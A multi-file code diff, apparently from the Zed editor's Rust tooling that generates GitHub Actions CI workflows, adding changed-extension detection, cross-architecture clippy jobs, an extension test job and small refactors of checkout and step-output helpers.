+ .map(|name| name.to_string())
.collect::<Vec<String>>(),
)
.cond(repository_owner_guard_expression(true))
@@ -282,6 +331,19 @@ pub fn tests_pass(jobs: &[NamedJob]) -> NamedJob {
named::job(job)
}
+/// Bash script snippet that detects changed extension directories from `$CHANGED_FILES`.
+/// Assumes `$CHANGED_FILES` is already set. Sets `$EXTENSIONS_JSON` to a JSON array of
+/// changed extension paths. Callers are responsible for writing the result to `$GITHUB_OUTPUT`.
+pub(crate) const DETECT_CHANGED_EXTENSIONS_SCRIPT: &str = indoc::indoc! {r#"
+ # Detect changed extension directories (excluding extensions/workflows)
+ CHANGED_EXTENSIONS=$(echo "$CHANGED_FILES" | grep -oP '^extensions/[^/]+(?=/)' | sort -u | grep -v '^extensions/workflows$' || true)
+ if [ -n "$CHANGED_EXTENSIONS" ]; then
+ EXTENSIONS_JSON=$(echo "$CHANGED_EXTENSIONS" | jq -R -s -c 'split("\n") | map(select(length > 0))')
+ else
+ EXTENSIONS_JSON="[]"
+ fi
+"#};
+
const TS_QUERY_LS_FILE: &str = "ts_query_ls-x86_64-unknown-linux-gnu.tar.gz";
const CI_TS_QUERY_RELEASE: &str = "tags/v3.15.1";
@@ -298,8 +360,8 @@ pub(crate) fn fetch_ts_query_ls() -> Step<Use> {
pub(crate) fn run_ts_query_ls() -> Step<Run> {
named::bash(formatdoc!(
- r#"tar -xf {TS_QUERY_LS_FILE}
- ./ts_query_ls format --check . || {{
+ r#"tar -xf "$GITHUB_WORKSPACE/{TS_QUERY_LS_FILE}" -C "$GITHUB_WORKSPACE"
+ "$GITHUB_WORKSPACE/ts_query_ls" format --check . || {{
echo "Found unformatted queries, please format them with ts_query_ls."
echo "For easy use, install the Tree-sitter query extension:"
echo "zed://extension/tree-sitter-query"
@@ -428,7 +490,12 @@ fn check_workspace_binaries() -> NamedJob {
))
}
-pub(crate) fn clippy(platform: Platform) -> NamedJob {
+pub(crate) fn clippy(platform: Platform, arch: Option<Arch>) -> NamedJob {
+ let target = arch.map(|arch| match (platform, arch) {
+ (Platform::Mac, Arch::X86_64) => "x86_64-apple-darwin",
+ (Platform::Mac, Arch::AARCH64) => "aarch64-apple-darwin",
+ _ => unimplemented!("cross-arch clippy not supported for {platform}/{arch}"),
+ });
let runner = match platform {
Platform::Windows => runners::WINDOWS_DEFAULT,
Platform::Linux => runners::LINUX_DEFAULT,
@@ -446,16 +513,20 @@ pub(crate) fn clippy(platform: Platform) -> NamedJob {
platform == Platform::Linux,
steps::install_linux_dependencies,
)
+ .when_some(target, |this, target| {
+ this.add_step(steps::install_rustup_target(target))
+ })
.add_step(steps::setup_sccache(platform))
- .add_step(steps::clippy(platform))
+ .add_step(steps::clippy(platform, target))
.add_step(steps::show_sccache_stats(platform));
if platform == Platform::Linux {
job = use_clang(job);
}
- NamedJob {
- name: format!("clippy_{platform}"),
- job,
- }
+ let name = match arch {
+ Some(arch) => format!("clippy_{platform}_{arch}"),
+ None => format!("clippy_{platform}"),
+ };
+ NamedJob { name, job }
}
pub(crate) fn run_platform_tests(platform: Platform) -> NamedJob {
@@ -692,3 +763,26 @@ pub(crate) fn check_scripts() -> NamedJob {
.add_step(check_xtask_workflows()),
)
}
+
+fn extension_tests() -> NamedJob<UsesJob> {
+ let job = Job::default()
+ .needs(vec!["orchestrate".to_owned()])
+ .cond(Expression::new(
+ "needs.orchestrate.outputs.changed_extensions != '[]'",
+ ))
+ .permissions(Permissions::default().contents(Level::Read))
+ .strategy(
+ Strategy::default()
+ .fail_fast(false)
+            // TODO: Remove the limit. We currently need this to work around the concurrency group issue
+            // where different matrix jobs would be placed in the same concurrency group and thus cancelled.
+ .max_parallel(1u32)
+ .matrix(json!({
+ "extension": "${{ fromJson(needs.orchestrate.outputs.changed_extensions) }}"
+ })),
+ )
+ .uses_local(".github/workflows/extension_tests.yml")
+ .with(Input::default().add("working-directory", "${{ matrix.extension }}"));
+
+ named::job(job)
+}
@@ -10,7 +10,7 @@ pub(crate) fn use_clang(job: Job) -> Job {
const SCCACHE_R2_BUCKET: &str = "sccache-zed";
-const BASH_SHELL: &str = "bash -euxo pipefail {0}";
+pub(crate) const BASH_SHELL: &str = "bash -euxo pipefail {0}";
// https://docs.github.com/en/actions/reference/workflows-and-actions/workflow-syntax#jobsjob_idstepsshell
pub const PWSH_SHELL: &str = "pwsh";
@@ -24,13 +24,6 @@ pub(crate) fn cargo_nextest(platform: Platform) -> Nextest {
}
impl Nextest {
- pub(crate) fn with_target(mut self, target: &str) -> Step<Run> {
- if let Some(nextest_command) = self.0.value.run.as_mut() {
- nextest_command.push_str(&format!(r#" --target "{target}""#));
- }
- self.into()
- }
-
#[allow(dead_code)]
pub(crate) fn with_filter_expr(mut self, filter_expr: &str) -> Self {
if let Some(nextest_command) = self.0.value.run.as_mut() {
@@ -131,22 +124,12 @@ impl From<CheckoutStep> for Step<Use> {
FetchDepth::Full => step.add_with(("fetch-depth", 0)),
FetchDepth::Custom(depth) => step.add_with(("fetch-depth", depth)),
})
- .map(|step| match value.token {
- Some(token) => step.add_with(("token", token)),
- None => step,
- })
- .map(|step| match value.path {
- Some(path) => step.add_with(("path", path)),
- None => step,
- })
- .map(|step| match value.repository {
- Some(repository) => step.add_with(("repository", repository)),
- None => step,
- })
- .map(|step| match value.ref_ {
- Some(ref_) => step.add_with(("ref", ref_)),
- None => step,
+ .when_some(value.path, |step, path| step.add_with(("path", path)))
+ .when_some(value.repository, |step, repository| {
+ step.add_with(("repository", repository))
})
+ .when_some(value.ref_, |step, ref_| step.add_with(("ref", ref_)))
+ .when_some(value.token, |step, token| step.add_with(("token", token)))
}
}
@@ -228,13 +211,20 @@ pub fn clear_target_dir_if_large(platform: Platform) -> Step<Run> {
}
}
-pub fn clippy(platform: Platform) -> Step<Run> {
+pub fn clippy(platform: Platform, target: Option<&str>) -> Step<Run> {
match platform {
Platform::Windows => named::pwsh("./script/clippy.ps1"),
- _ => named::bash("./script/clippy"),
+ _ => match target {
+ Some(target) => named::bash(format!("./script/clippy --target {target}")),
+ None => named::bash("./script/clippy"),
+ },
}
}
+pub fn install_rustup_target(target: &str) -> Step<Run> {
+ named::bash(format!("rustup target add {target}"))
+}
+
pub fn cache_rust_dependencies_namespace() -> Step<Use> {
named::uses("namespacelabs", "nscloud-cache-action", "v1")
.add_with(("cache", "rust"))
@@ -279,18 +269,12 @@ pub fn setup_linux() -> Step<Run> {
named::bash("./script/linux")
}
-fn install_mold() -> Step<Run> {
- named::bash("./script/install-mold")
-}
-
fn download_wasi_sdk() -> Step<Run> {
named::bash("./script/download-wasi-sdk")
}
pub(crate) fn install_linux_dependencies(job: Job) -> Job {
- job.add_step(setup_linux())
- .add_step(install_mold())
- .add_step(download_wasi_sdk())
+ job.add_step(setup_linux()).add_step(download_wasi_sdk())
}
pub fn script(name: &str) -> Step<Run> {
@@ -156,14 +156,31 @@ pub(crate) struct StepOutput {
impl StepOutput {
pub fn new<T>(step: &Step<T>, name: &'static str) -> Self {
- Self {
- name,
- step_id: step
- .value
- .id
- .clone()
- .expect("Steps that produce outputs must have an ID"),
- }
+ let step_id = step
+ .value
+ .id
+ .clone()
+ .expect("Steps that produce outputs must have an ID");
+
+ assert!(
+ step.value
+ .run
+ .as_ref()
+ .is_none_or(|run_command| run_command.contains(name)),
+ "Step Output name {name} must occur at least once in run command with ID {step_id}!"
+ );
+
+ Self { name, step_id }
+ }
+
+ pub fn new_unchecked<T>(step: &Step<T>, name: &'static str) -> Self {
+ let step_id = step
+ .value
+ .id
+ .clone()
+ .expect("Steps that produce outputs must have an ID");
+
+ Self { name, step_id }
}
pub fn expr(&self) -> String {
@@ -92,6 +92,8 @@ extend-ignore-re = [
# AMD GPU Services
"ags",
# AMD GPU Services
- "AGS"
+ "AGS",
+ # Yarn Plug'n'Play
+ "PnP"
]
check-filename = true